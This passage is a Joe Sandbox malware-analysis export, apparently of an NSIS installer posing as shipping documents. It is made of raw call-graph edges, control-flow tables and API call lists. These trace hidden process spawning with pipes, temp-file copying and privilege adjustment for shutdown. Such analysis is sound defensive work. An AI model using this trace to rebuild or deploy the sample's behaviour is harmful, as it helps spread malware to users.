405829 3177->3188 3179 405788 3178->3179 3178->3188 3180 4057b0 GetSysColor 3179->3180 3181 4057bc 3179->3181 3179->3188 3180->3181 3182 4057c0 SetTextColor 3181->3182 3183 4057ca SetBkMode 3181->3183 3182->3183 3184 4057f2 3183->3184 3185 4057e3 GetSysColor 3183->3185 3186 4057f6 SetBkColor 3184->3186 3187 405803 3184->3187 3185->3184 3186->3187 3187->3188 3189 405813 DeleteObject 3187->3189 3190 40581c CreateBrushIndirect 3187->3190 3188->3152 3189->3190 3190->3188 3191->3155 3193 405965 SendMessageW 3192->3193 3194 40595f 3192->3194 3193->3155 3194->3193 3196 405d4c 3195->3196 3202 405e02 3195->3202 3197 405d6b lstrlenW 3196->3197 3198 405eba 16 API calls 3196->3198 3199 405da0 3197->3199 3200 405d7d lstrlenW 3197->3200 3198->3197 3203 405db7 3199->3203 3204 405daa SetWindowTextW 3199->3204 3201 405d92 lstrcatW 3200->3201 3200->3202 3201->3199 3202->3141 3203->3202 3205 405dbc SendMessageW SendMessageW SendMessageW 3203->3205 3204->3203 3205->3202 3207 405ec5 3206->3207 3208 4060fe 3207->3208 3212 4060c9 lstrlenW 3207->3212 3213 405fde GetSystemDirectoryW 3207->3213 3215 405eba 10 API calls 3207->3215 3216 405ff1 GetWindowsDirectoryW 3207->3216 3218 405eba 10 API calls 3207->3218 3219 406d3d CharNextW CharNextW CharNextW CharNextW CharPrevW 3207->3219 3220 40606a lstrcatW 3207->3220 3221 406036 SHGetPathFromIDListW CoTaskMemFree 3207->3221 3222 406977 3207->3222 3227 40661f wsprintfW 3207->3227 3228 406b1a lstrcpynW 3207->3228 3209 404de7 AppendMenuW 3208->3209 3229 406b1a lstrcpynW 3208->3229 3209->3161 3209->3162 3212->3207 3213->3207 3215->3212 3216->3207 3218->3207 3219->3207 3220->3207 3221->3207 3230 4062d8 3222->3230 3225 4069dd 3225->3207 3226 4069ac RegQueryValueExW RegCloseKey 3226->3225 3227->3207 3228->3207 3229->3209 3231 4062e7 3230->3231 3232 4062f0 RegOpenKeyExW 3231->3232 3233 4062eb 3231->3233 3232->3233 3233->3225 3233->3226 3241 4054e8 3234->3241 3236 4058ae 3237 4054e8 SendMessageW 3236->3237 3238 4058c0 OleUninitialize 3237->3238 3239 405887 3239->3236 3244 401399 3239->3244 3242 405500 3241->3242 3243 4054f1 SendMessageW 3241->3243 3242->3239 3243->3242 3245 401413 3244->3245 3247 4013a3 3244->3247 3245->3239 3247->3245 3248 4013df MulDiv SendMessageW 3247->3248 3249 40154a 3247->3249 3248->3247 3250 4015c3 3249->3250 3300 4015ce 3249->3300 3251 4016c1 3250->3251 3252 4017c2 3250->3252 3253 4015e6 3250->3253 3254 4018cb 3250->3254 3255 40160c 3250->3255 3256 4016ef 3250->3256 3257 4016af 3250->3257 3258 40182f 3250->3258 3259 401711 3250->3259 3260 401633 SetForegroundWindow 3250->3260 3261 4017d3 3250->3261 3262 401618 3250->3262 3263 4015f9 3250->3263 3264 40189b 3250->3264 3265 4018de 3250->3265 3266 40163f 3250->3266 3250->3300 3359 4015d5 3250->3359 3276 4016d1 ShowWindow 3251->3276 3277 4016d9 3251->3277 3267 40303e 16 API calls 3252->3267 3279 4015f0 PostQuitMessage 3253->3279 3253->3300 3271 40303e 16 API calls 3254->3271 3283 405d3a 23 API calls 3255->3283 3278 40303e 16 API calls 3256->3278 3424 40661f wsprintfW 3257->3424 3274 40303e 16 API calls 3258->3274 3360 40303e 3259->3360 3260->3300 3270 40303e 16 API calls 3261->3270 3421 403002 3262->3421 3293 401399 72 API calls 3263->3293 3269 40303e 16 API calls 3264->3269 3273 40303e 16 API calls 3265->3273 3297 403002 16 API calls 3266->3297 3266->3300 3280 4017c8 3267->3280 3282 4018a2 SearchPathW 3269->3282 3284 4017da 3270->3284 3285 4018d2 3271->3285 3287 4018e5 3273->3287 3288 401835 GetFullPathNameW 3274->3288 3276->3277 3289 4016e6 ShowWindow 3277->3289 3277->3300 3291 4016f6 SetFileAttributesW 3278->3291 3279->3300 3428 4065cf FindFirstFileW 3280->3428 3282->3300 3283->3300 3295 40303e 16 API calls 3284->3295 3384 406a56 3285->3384 3286 40161e Sleep 3286->3300 3305 401906 3287->3305 3306 40190e 3287->3306 3298 401857 3288->3298 3299 40184d 3288->3299 3289->3300 3290 405d3a 23 API calls 3290->3300 3291->3300 3293->3300 3301 4017e3 3295->3301 3297->3300 3298->3299 3312 4065cf 2 API calls 3298->3312 3299->3300 3302 401889 GetShortPathNameW 3299->3302 3300->3247 3304 40303e 16 API calls 3301->3304 3302->3300 3303 401780 3303->3255 3311 401790 3303->3311 3308 4017ec MoveFileW 3304->3308 3436 406b1a lstrcpynW 3305->3436 3437 406b1a lstrcpynW 3306->3437 3313 401804 3308->3313 3314 4017f8 3308->3314 3317 405d3a 23 API calls 3311->3317 3318 40186a 3312->3318 3313->3300 3321 4065cf 2 API calls 3313->3321 3314->3255 3315 40190c 3388 406d3d 3315->3388 3316 401919 3438 406556 lstrlenW CharPrevW 3316->3438 3320 401797 3317->3320 3318->3299 3435 406b1a lstrcpynW 3318->3435 3383 406b1a lstrcpynW 3320->3383 3328 401814 3321->3328 3328->3300 3431 40623d MoveFileExW 3328->3431 3329 401720 3329->3303 3332 401769 GetFileAttributesW 3329->3332 3371 4065f6 3329->3371 3375 4064fc 3329->3375 3378 405e3e CreateDirectoryW 3329->3378 3425 405e1e CreateDirectoryW 3329->3425 3330 4017a2 SetCurrentDirectoryW 3330->3300 3332->3329 3334 4065cf 2 API calls 3350 40192b 3334->3350 3337 40193f CompareFileTime 3337->3350 3338 401a18 3340 405d3a 23 API calls 3338->3340 3339 4019fd 3342 405d3a 23 API calls 3339->3342 3343 401a24 3340->3343 3341 406b1a lstrcpynW 3341->3350 3342->3300 3401 403148 3343->3401 3346 401a52 SetFileTime 3347 401a60 CloseHandle 3346->3347 3347->3300 3349 401a73 3347->3349 3348 405eba 16 API calls 3348->3350 3351 401a78 3349->3351 3352 401a89 3349->3352 3350->3334 3350->3337 3350->3338 3350->3339 3350->3341 3350->3348 3350->3359 3397 406b9d GetFileAttributesW 3350->3397 3400 40691b GetFileAttributesW CreateFileW 3350->3400 3441 406aa8 3350->3441 3353 405eba 16 API calls 3351->3353 3354 405eba 16 API calls 3352->3354 3355 401a80 lstrcatW 3353->3355 3356 401a91 3354->3356 3355->3356 3358 406aa8 MessageBoxIndirectW 3356->3358 3358->3300 3359->3290 3359->3300 3361 405eba 16 API calls 3360->3361 3362 403067 3361->3362 3363 401718 3362->3363 3364 406d3d 5 API calls 3362->3364 3365 406bc5 CharNextW CharNextW 3363->3365 3364->3363 3366 406be3 3365->3366 3370 406c1a 3365->3370 3367 406bf2 CharNextW 3366->3367 3369 406bf7 3366->3369 3367->3370 3368 4065f6 CharNextW 3368->3369 3369->3368 3369->3370 3370->3329 3372 406602 3371->3372 3373 40661c 3371->3373 3372->3373 3374 40660b CharNextW 3372->3374 3373->3329 3374->3372 3374->3373 3445 4068e6 GetModuleHandleA 3375->3445 3379 405e89 GetLastError 3378->3379 3380 405eac 3378->3380 3379->3380 3381 405e96 SetFileSecurityW 3379->3381 3380->3329 3381->3380 3382 405eb0 GetLastError 3381->3382 3382->3380 3383->3330 3385 406a63 GetTickCount GetTempFileNameW 3384->3385 3386 406a9b 3385->3386 3387 406a97 3385->3387 3386->3300 3387->3385 3387->3386 3395 406d52 3388->3395 3389 406dd4 3390 406ddc CharPrevW 3389->3390 3392 406dfc 3389->3392 3390->3389 3391 406dc5 CharNextW 3391->3389 3391->3395 3392->3350 3393 4065f6 CharNextW 3393->3395 3394 406db1 CharNextW 3394->3395 3395->3389 3395->3391 3395->3393 3395->3394 3396 406dc0 CharNextW 3395->3396 3396->3391 3398 406bbf 3397->3398 3399 406baf SetFileAttributesW 3397->3399 3398->3350 3399->3398 3400->3350 3402 403190 3401->3402 3403 403183 3401->3403 3454 406948 ReadFile 3402->3454 3461 403131 SetFilePointer 3403->3461 3407 4031b6 GetTickCount 3409 403208 3407->3409 3416 401a3a 3407->3416 3408 40331b 3410 403362 3408->3410 3414 40331f 3408->3414 3409->3416 3417 40325f GetTickCount 3409->3417 3418 403290 MulDiv wsprintfW 3409->3418 3456 40311b 3409->3456 3459 406a0b WriteFile 3409->3459 3412 40311b ReadFile 3410->3412 3412->3416 3413 40311b ReadFile 3413->3414 3414->3413 3415 406a0b WriteFile 3414->3415 3414->3416 3415->3414 3416->3346 3416->3347 3417->3409 3419 405d3a 23 API calls 3418->3419 3419->3409 3422 405eba 16 API calls 3421->3422 3423 403016 3422->3423 3423->3286 3424->3300 3426 405e30 GetLastError 3425->3426 3427 405e38 3425->3427 3426->3427 3427->3329 3429 4065e5 FindClose 3428->3429 3430 4065f0 3428->3430 3429->3430 3430->3300 3432 40625e 3431->3432 3433 406251 3431->3433 3432->3314 3462 406306 3433->3462 3435->3299 3436->3315 3437->3316 3439 406573 lstrcatW 3438->3439 3440 40191f lstrcatW 3438->3440 3439->3440 3440->3315 3442 406abd 3441->3442 3443 406b0b 3442->3443 3444 406ad3 MessageBoxIndirectW 3442->3444 3443->3350 3444->3443 3446 406908 GetProcAddress 3445->3446 3447 4068fe 3445->3447 3449 406503 3446->3449 3451 40619e GetSystemDirectoryW 3447->3451 3449->3329 3450 406904 3450->3446 3450->3449 3452 4061c0 wsprintfW LoadLibraryExW 3451->3452 3452->3450 3455 4031a2 3454->3455 3455->3407 3455->3408 3455->3416 3457 406948 ReadFile 3456->3457 3458 40312e 3457->3458 3458->3409 3460 406a2c 3459->3460 3460->3409 3461->3402 3463 406336 3462->3463 3464 40635c GetShortPathNameW 3462->3464 3489 40691b GetFileAttributesW CreateFileW 3463->3489 3465 406371 3464->3465 3466 40643c 3464->3466 3465->3466 3468 406379 wsprintfA 3465->3468 3466->3432 3470 405eba 16 API calls 3468->3470 3469 406340 CloseHandle GetShortPathNameW 3469->3466 3471 406354 3469->3471 3472 4063a2 3470->3472 3471->3464 3471->3466 3490 40691b GetFileAttributesW CreateFileW 3472->3490 3474 4063af 3474->3466 3475 4063ba GetFileSize GlobalAlloc 3474->3475 3476 406435 CloseHandle 3475->3476 3477 4063d9 3475->3477 3476->3466 3478 406948 ReadFile 3477->3478 3479 4063e1 3478->3479 3479->3476 3491 406b36 lstrlenA lstrlenA 3479->3491 3482 406441 3484 406b36 3 API calls 3482->3484 3483 4063f4 lstrcpyA 3485 406406 3483->3485 3484->3485 3486 406417 SetFilePointer 3485->3486 3487 406a0b WriteFile 3486->3487 3488 40642e GlobalFree 3487->3488 3488->3476 3489->3469 3490->3474 3492 4063f0 3491->3492 3493 406b55 3491->3493 3492->3482 3492->3483 3493->3492 3494 406b82 lstrlenA 3493->3494 3494->3492 3494->3493 4772 4027b0 4773 4030c1 16 API calls 4772->4773 4774 4027ba 4773->4774 4775 403002 16 API calls 4774->4775 4776 4027c3 4775->4776 4777 4027f0 RegEnumValueW 4776->4777 4778 4027e4 RegEnumKeyW 4776->4778 4780 401709 4776->4780 4779 40280e RegCloseKey 4777->4779 4778->4779 4779->4780 4784 404f33 4785 404f57 4784->4785 4786 404f3f 4784->4786 4788 404f8b 4785->4788 4789 404f5d SHGetPathFromIDListW 4785->4789 4794 406a3a GetDlgItemTextW 4786->4794 4790 404f4c SendMessageW 4789->4790 4791 404f6d 4789->4791 4790->4788 4793 401533 89 API calls 4791->4793 4793->4790 4794->4790 4795 401ab6 4796 40303e 16 API calls 4795->4796 4797 401abd 4796->4797 4798 406aa8 MessageBoxIndirectW 4797->4798 4799 401709 4798->4799 4800 402837 4801 40303e 16 API calls 4800->4801 4803 401afd 4801->4803 4803->4800 4804 402855 4803->4804 4805 40691b GetFileAttributesW CreateFileW 4803->4805 4805->4803 4806 401fb8 GetDC 4807 403002 16 API calls 4806->4807 4808 401fc8 GetDeviceCaps MulDiv ReleaseDC 4807->4808 4809 403002 16 API calls 4808->4809 4810 401ff8 4809->4810 4811 405eba 16 API calls 4810->4811 4812 402032 CreateFontIndirectW 4811->4812 3719 401dba 3720 403002 16 API calls 3719->3720 3721 401dc1 3720->3721 3722 403002 16 API calls 3721->3722 3723 401dce 3722->3723 3724 401de1 3723->3724 3726 40303e 16 API calls 3723->3726 3725 401df6 3724->3725 3727 40303e 16 API calls 3724->3727 3728 401e50 3725->3728 3729 401e01 3725->3729 3726->3724 3727->3725 3731 40303e 16 API calls 3728->3731 3730 403002 16 API calls 3729->3730 3732 401e06 3730->3732 3733 401e55 3731->3733 3735 403002 16 API calls 3732->3735 3734 40303e 16 API calls 3733->3734 3736 401e5e FindWindowExW 3734->3736 3737 401e11 3735->3737 3740 401e7b 3736->3740 3738 401e41 SendMessageW 3737->3738 3739 401e1e SendMessageTimeoutW 3737->3739 3738->3740 3739->3740 4813 401bbb 4814 40303e 16 API calls 4813->4814 4815 401bc4 ExpandEnvironmentStringsW 4814->4815 4816 401bd7 4815->4816 4818 401be9 4815->4818 4817 401bdd lstrcmpW 4816->4817 4816->4818 4817->4818

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 7347114e-73471191 call 73471a8f 3 73471197-734711e8 GetModuleFileNameW GlobalAlloc 0->3 4 73471304-73471329 GlobalAlloc 0->4 6 734711e9-734711ec 3->6 5 7347132d-73471344 4->5 7 73471346-73471360 FindWindowExW * 2 5->7 8 73471365 5->8 9 734711ee-73471208 CharPrevW 6->9 10 7347120a-73471219 6->10 7->8 11 7347136b-73471380 call 73471d96 call 73471d07 8->11 9->6 9->10 12 73471231-73471265 GetTempFileNameW CopyFileW 10->12 13 7347121b-73471220 call 73471dd8 10->13 25 73471397-734713a1 lstrcmpiW 11->25 26 73471382-7347138c call 73471c5f 11->26 16 73471267-734712a2 CreateFileW CreateFileMappingW MapViewOfFile 12->16 17 734712d9-73471302 lstrcatW lstrlenW 12->17 19 73471225-7347122c GlobalFree 13->19 20 734712a4-734712c9 UnmapViewOfFile 16->20 21 734712cf-734712d5 CloseHandle * 2 16->21 17->5 23 73471a2a-73471a34 19->23 20->21 21->17 28 734713a3-734713ac 25->28 29 734713ae-734713b8 lstrcmpiW 25->29 33 73471390-73471395 26->33 28->33 30 734713c4-734713c9 29->30 31 734713ba-734713c2 29->31 34 734713f6-73471480 call 73471d68 GetVersion 30->34 35 734713cb-734713da call 73471dd8 30->35 31->33 33->11 42 73471482-734714b5 GlobalAlloc 34->42 43 734714da-734714e6 34->43 40 734713e2-734713e4 35->40 41 734713dc-734713de 35->41 40->19 44 734713ea-734713f1 DeleteFileW 40->44 41->40 45 734714b7-734714cc lstrcpyW 42->45 46 734714d1-734714d8 42->46 47 734714ea-734714f7 43->47 44->19 50 73471958-73471960 45->50 46->47 48 73471529-73471543 CreatePipe 47->48 49 734714f9-73471525 InitializeSecurityDescriptor SetSecurityDescriptorDacl 47->49 48->45 51 73471549-7347155f CreatePipe 48->51 49->48 52 73471962-73471968 call 73471dd8 50->52 53 7347196a-73471972 50->53 51->45 54 73471565-734715c6 GetStartupInfoW CreateProcessW 51->54 56 73471987-73471990 52->56 53->56 57 73471974-73471979 53->57 54->45 58 734715cc-734715d6 GetTickCount 54->58 61 734719a5-734719ae 56->61 62 73471992-734719a1 lstrcpyW 56->62 57->56 60 7347197b-73471986 call 73471b08 57->60 63 734715da 58->63 60->56 65 734719c7-73471a03 call 73471dd8 CloseHandle * 6 61->65 66 734719b0-734719c4 wsprintfW 61->66 62->61 67 734715e0 63->67 72 73471a05-73471a07 65->72 73 73471a0b-73471a11 65->73 66->65 71 734715e2-734715fa WaitForSingleObject GetExitCodeProcess 67->71 74 73471600-7347161a PeekNamedPipe 71->74 72->73 75 73471a13-73471a14 DeleteFileW 73->75 76 73471a1a-73471a25 GlobalFree 73->76 77 73471620-7347166b GetTickCount ReadFile 74->77 78 734718fe-73471903 74->78 75->76 76->23 79 73471a27-73471a28 GlobalFree 76->79 80 73471693-73471698 77->80 81 7347166d-7347166f 77->81 82 73471905-7347190b 78->82 83 7347194a-73471952 78->83 79->23 85 734718f5-734718f9 80->85 86 7347169e-734716a4 80->86 81->80 84 73471671-7347168f IsTextUnicode 81->84 87 7347193d-73471945 Sleep 82->87 88 7347190d-7347191b GetTickCount 82->88 83->50 84->80 85->71 86->67 89 734716aa 86->89 87->67 88->87 90 7347191d-73471938 TerminateProcess lstrcpyW 88->90 91 734716ae-734716b8 89->91 90->67 92 734716ba 91->92 93 734716be-734716d3 92->93 93->74 94 734716d9-734716db 93->94 95 73471704-73471709 94->95 96 734716dd-734716e0 94->96 98 7347170b-7347171b IsDBCSLeadByteEx 95->98 99 73471758 95->99 96->74 97 734716e6-734716eb 96->97 100 734716fd-73471702 97->100 101 734716ed-734716fb 97->101 102 7347172e 98->102 103 7347171d-73471726 98->103 104 7347175c-73471763 99->104 100->93 101->104 106 73471732-73471756 MultiByteToWideChar 102->106 103->74 105 7347172c 103->105 107 73471764-73471768 104->107 105->106 106->107 108 7347176a-73471772 107->108 109 73471799-7347179d 107->109 110 734717d6-734717d8 108->110 111 73471774-73471778 108->111 112 7347179f-734717a7 109->112 113 734717a9-734717ad 109->113 118 73471812-7347181a 110->118 119 734717da-734717e0 110->119 114 7347177e-73471797 lstrcpyW 111->114 115 7347181c-7347183a GlobalReAlloc 111->115 112->113 116 734717fd-7347180d 112->116 113->110 117 734717af-734717b7 113->117 114->116 121 734718d5-734718f0 lstrcpyW 115->121 122 73471840-7347185a 115->122 116->92 117->110 123 734717b9-734717d4 call 73471b08 117->123 118->115 120 7347185f-73471872 118->120 124 734717e2-734717f7 119->124 125 734717f9 119->125 126 73471874-73471884 call 73471bcb 120->126 127 73471889-7347188e 120->127 121->63 122->91 123->116 124->124 124->125 125->116 126->67 127->71 130 73471894-734718c6 CharNextExA 127->130 130->71 133 734718cc-734718d0 130->133 133->71
                                      APIs
                                        • Part of subcall function 73471A8F: GetCurrentProcess.KERNEL32 ref: 73471A97
                                        • Part of subcall function 73471A8F: GetModuleHandleA.KERNEL32(KERNEL32), ref: 73471AA4
                                        • Part of subcall function 73471A8F: lstrcpyA.KERNEL32(?,IsWow64Process2), ref: 73471AB5
                                        • Part of subcall function 73471A8F: GetProcAddress.KERNEL32(00000000,?), ref: 73471AC0
                                      • GetModuleFileNameW.KERNEL32(?,00000104), ref: 734711AA
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 734711C5
                                      • CharPrevW.USER32(?,?), ref: 734711F7
                                      • GlobalFree.KERNEL32(00000000), ref: 73471226
                                      • GetTempFileNameW.KERNEL32(?,734720E8,00000000,00000002), ref: 73471245
                                      • CopyFileW.KERNEL32(?,00000002,00000000), ref: 7347125D
                                      • CreateFileW.KERNEL32(00000002,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 73471277
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 73471288
                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 73471298
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 734712C9
                                      • CloseHandle.KERNEL32(00000000), ref: 734712D0
                                      • CloseHandle.KERNEL32(00000000), ref: 734712D3
                                      • lstrcatW.KERNEL32(00000000,734720F0), ref: 734712DF
                                      • lstrlenW.KERNEL32(00000000), ref: 734712E6
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 7347131B
                                      • FindWindowExW.USER32(?,00000000,#32770,00000000), ref: 7347135B
                                      • FindWindowExW.USER32(00000000), ref: 7347135E
                                      • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 7347139D
                                      • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 734713B4
                                      • DeleteFileW.KERNEL32(00000000,error), ref: 734713EB
                                      • GetVersion.KERNEL32 ref: 73471435
                                      • GlobalAlloc.KERNEL32(00000040,00001002), ref: 734714A7
                                      • lstrcpyW.KERNEL32(?,error), ref: 734714CA
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 73471502
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 73471516
                                      • CreatePipe.KERNELBASE(?,?,?,00000000), ref: 7347153F
                                      • CreatePipe.KERNELBASE(?,?,?,00000000), ref: 7347155B
                                      • GetStartupInfoW.KERNEL32(?), ref: 7347156D
                                      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 734715BE
                                      • GetTickCount.KERNEL32 ref: 734715CC
                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 734715E7
                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 734715FA
                                      • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 7347160F
                                      • GetTickCount.KERNEL32 ref: 73471620
                                      • ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 73471645
                                      • IsTextUnicode.ADVAPI32(73473000,-00000400,00000000), ref: 7347167B
                                      • IsDBCSLeadByteEx.KERNEL32(?,00000000), ref: 73471713
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,?,00000002), ref: 73471745
                                      • lstrcpyW.KERNEL32(?, ), ref: 73471784
                                      • GlobalReAlloc.KERNEL32(00000000,?,00000042), ref: 73471832
                                      • CharNextExA.USER32(?,00000000,00000000), ref: 734718B7
                                      • lstrcpyW.KERNEL32(?,error), ref: 734718E2
                                      • GetTickCount.KERNEL32 ref: 7347190D
                                      • TerminateProcess.KERNEL32(?,000000FF), ref: 73471923
                                      • lstrcpyW.KERNEL32(?,timeout), ref: 73471936
                                      • Sleep.KERNELBASE(00000064), ref: 7347193F
                                        • Part of subcall function 73471B08: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 73471B29
                                        • Part of subcall function 73471B08: SendMessageW.USER32(0000104D,00000000,?), ref: 73471B51
                                        • Part of subcall function 73471B08: SendMessageW.USER32(00001013,?,00000000), ref: 73471B62
                                      • lstrcpyW.KERNEL32(?,error), ref: 7347199F
                                      • wsprintfW.USER32 ref: 734719BE
                                      • CloseHandle.KERNEL32(?,00000000), ref: 734719DE
                                      • CloseHandle.KERNEL32(?), ref: 734719E4
                                      • CloseHandle.KERNEL32(?), ref: 734719EA
                                      • CloseHandle.KERNEL32(?), ref: 734719F0
                                      • CloseHandle.KERNEL32(?), ref: 734719F6
                                      • CloseHandle.KERNEL32(?), ref: 734719FC
                                      • DeleteFileW.KERNEL32(?), ref: 73471A14
                                      • GlobalFree.KERNEL32(00000000), ref: 73471A21
                                      • GlobalFree.KERNEL32(00000000), ref: 73471A28
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                      • Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$Handle$Close$Global$lstrcpy$Create$AllocProcess$CharCountFreeMessagePipeSendTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                      • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                      • API String ID: 901601142-2772347907
                                      • Opcode ID: 5167ff64d2b4f7824bcf5de22ce98b001c09547fc27a37a4c4e73639b5bc121c
                                      • Instruction ID: 662ad12d7fbc1892306be1348eaf799f44687f9da2170f705ea5f1212dfd7805
                                      • Opcode Fuzzy Hash: 5167ff64d2b4f7824bcf5de22ce98b001c09547fc27a37a4c4e73639b5bc121c
                                      • Instruction Fuzzy Hash: 86426C715083859FD719DF65C844BABBBF9FB88300F10492EFA9AE2250E730D945CB66

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 134 4036fc-403745 SetErrorMode GetVersionExW 135 403747-403767 GetVersionExW 134->135 136 40377e 134->136 137 403769-40376d 135->137 138 40377a-40377c 135->138 139 403785-40378a 136->139 140 403770-403778 137->140 138->140 141 403797 139->141 142 40378c-403795 139->142 140->139 143 40379b-4037dd 141->143 142->143 144 4037f0 143->144 145 4037df-4037e7 call 4068e6 143->145 147 4037f5-403807 call 40619e lstrlenA 144->147 145->144 151 4037e9 145->151 152 403809-403825 call 4068e6 * 3 147->152 151->144 159 403836-4038cf #17 OleInitialize SHGetFileInfoW call 406b1a GetCommandLineW call 406b1a call 4065f6 CharNextW 152->159 160 403827-40382d 152->160 169 4038d5 159->169 170 4039aa-4039c4 GetTempPathW call 403ca5 159->170 160->159 164 40382f 160->164 164->159 171 4038d7-4038dd 169->171 178 4039c6-4039e4 GetWindowsDirectoryW lstrcatW call 403ca5 170->178 179 403a1c-403a35 DeleteFileW call 4033ed 170->179 173 4038ea-4038f5 171->173 174 4038df-4038e8 171->174 176 403900-40390f 173->176 177 4038f7-4038fe 173->177 174->173 174->174 182 403911-40391d 176->182 183 40396a-40397e call 4065f6 176->183 177->176 178->179 189 4039e6-403a16 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403ca5 178->189 191 403be6 179->191 192 403a3b-403a41 179->192 187 403937-40393d 182->187 188 40391f-403926 182->188 199 403980-403983 183->199 200 403986-40398c 183->200 195 403959-403960 187->195 196 40393f-403946 187->196 193 403928-40392b 188->193 194 40392d 188->194 189->179 214 403be4 189->214 203 403bea-403bf7 call 4036d2 OleUninitialize 191->203 201 403a43-403a55 call 4065f6 192->201 202 403aa6-403aad call 405a3e 192->202 193->187 193->194 194->187 195->183 198 403962-403968 195->198 196->195 204 403948-40394f 196->204 198->183 209 403996-4039a5 call 406b1a 198->209 199->200 200->170 210 40398e-403991 200->210 220 403a6b-403a6d 201->220 217 403ab2-403ab4 202->217 218 403bf9-403c04 call 406aa8 203->218 219 403c0c-403c13 203->219 206 403951-403954 204->206 207 403956 204->207 206->195 206->207 207->195 209->170 210->171 214->191 217->203 228 403c06 ExitProcess 218->228 224 403c91-403ca0 219->224 225 403c15-403c2b GetCurrentProcess OpenProcessToken 219->225 221 403a57-403a5d 220->221 222 403a6f-403a76 220->222 232 403a68 221->232 233 403a5f-403a66 221->233 226 403a78-403a88 call 406638 222->226 227 403ab9-403ad1 call 4064fc lstrcatW 222->227 224->228 230 403c61-403c6f call 4068e6 225->230 231 403c2d-403c5b LookupPrivilegeValueW AdjustTokenPrivileges 225->231 240 403be0-403be2 226->240 241 403a8e-403aa4 call 406b1a * 2 226->241 244 403ae2-403b03 lstrcatW lstrcmpiW 227->244 245 403ad3-403add lstrcatW 227->245 242 403c71-403c7b 230->242 243 403c7d-403c88 ExitWindowsEx 230->243 231->230 232->220 233->222 233->232 240->203 241->202 242->243 246 403c8a-403c8c call 401533 242->246 243->224 243->246 244->240 247 403b09-403b10 244->247 245->244 246->224 250 403b12-403b17 call 405e3e 247->250 251 403b19 call 405e1e 247->251 258 403b1e-403b30 SetCurrentDirectoryW 250->258 251->258 260 403b41-403b5b call 406b1a 258->260 261 403b32-403b3c call 406b1a 258->261 265 403b5c-403b7a call 405eba DeleteFileW 260->265 261->260 268 403bc9-403bd3 265->268 269 403b7c-403b90 CopyFileW 265->269 268->265 271 403bd5-403bdb call 40623d 268->271 269->268 270 403b92-403bbe call 40623d call 405eba call 4066d6 269->270 270->268 279 403bc0-403bc7 CloseHandle 270->279 271->240 279->268
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403718
                                      • GetVersionExW.KERNEL32 ref: 00403741
                                      • GetVersionExW.KERNEL32(?), ref: 00403754
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037FC
                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403836
                                      • OleInitialize.OLE32(00000000), ref: 0040383D
                                      • SHGetFileInfoW.SHELL32(004095B0,00000000,?,000002B4,00000000), ref: 0040385C
                                      • GetCommandLineW.KERNEL32(00434A00,NSIS Error), ref: 00403871
                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",?,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000), ref: 004038BD
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004039BB
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039CC
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D8
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039EC
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F4
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403A05
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A0D
                                      • DeleteFileW.KERNELBASE(1033), ref: 00403A27
                                        • Part of subcall function 004033ED: GetTickCount.KERNEL32 ref: 00403400
                                        • Part of subcall function 004033ED: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,00000400,?,?,?,?,?), ref: 0040341C
